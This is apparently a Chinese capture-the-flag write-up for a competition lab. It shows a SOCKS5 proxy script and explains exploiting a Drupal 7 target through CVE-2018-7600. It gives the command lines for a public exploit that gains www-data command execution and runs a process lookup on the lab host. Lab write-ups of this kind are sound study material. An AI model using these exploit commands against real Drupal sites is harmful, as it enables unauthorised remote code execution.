前些日子比赛结束了，还是有很多小伙伴想要我们这次解题的部分WP，我们这次给大家分享一下实战题的解题思路，其中遇到的一些小坑也是其中代理的问题，解决完成之后一切都好说了。

审题

我们首先需要使用Windows系统操作，因为系统并没有给我们提供MacOS和Linux环境的相关程序（当然，你也可以找）。

注意事项

设置连接后，然后访问Server1，这个时候会可能有些问题，比如你有代理插件，设置「“无代理”」会出现无法访问的情况。

我们这时候需要设置一个系统代理，为什么呢？

因为这个环境很坑的帮我们设置了一个Socks5代理，如果你没有发现这个问题可能都不会知道有这个代理。（hha，大家看到这篇文章的时候可能已经不需要这个环境啦！）

我们访问这个脚本地址，拿到脚本：

var myproxy = "SOCKS5 127.0.0.1:1080; "
var subNet = ["10.119.4.206", "172.18.0.2"]
var subMask = ["255.255.255.255", "255.255.255.255"]
var direct = 'DIRECT;';
function alert_eval(str) { alert(str + ' is ' + eval(str)) }
function FindProxyForURL(url, host) {
    for (let index=0; index < subNet.length; index++) {
        if(isInNet(host, subNet[index], subMask[index])) {
            return myproxy;
        }
    }
    return direct;
}

「其中表明：你设置了一个Socks5的代理，代理IP地址为127.0.0.1:1080」

信息收集

访问172.18.0.2（靶机内网IP）

我们发现访问到了一个Drupal 7的环境，这个环境最容易出现的漏洞（影响较大的漏洞）我们使用最最最笨的办法：

也就是CVE-2018-7602和CVE-2018-7600，这两个漏洞都都是远程代码执行。

我们使用Msf看一下这个漏洞的信息

得到了一个比较广的范围，那么我们其实可以直接实验了，没有必要再追究版本问题了。

漏洞利用

Github找个exp：https://github.com/pimps/CVE-2018-7600

首先安装requests、bs4（我相信大家都装了）

python ./drupa7-CVE-2018-7600.py -p socks5://127.0.0.1:1080 http://172.18.0.2/

执行命令，应该能拿到 uid=33(www-data) gid=33(www-data) groups=33(www-data)

如果上一步成功了，则下面就可以执行命令了，如果没有成功，那可能是环境问题或者是你的代理问题。

./drupa7-CVE-2018-7600.py -c "pidof VehicleController" -p socks5://127.0.0.1:1080 http://172.18.0.2/

使用上面的命令就能拿到进程号

当然，我们也可以用msf一把梭，这样也可以哦。

环境已经复现到平台，可以直接在平台中练习。

备注

备注：本篇文章在比赛结束后进行解密，供大家查看。文章发布于5月3日，在比赛结束之前一直是以加密方式保存，没有进行泄露。解密日期：2023年05月29日。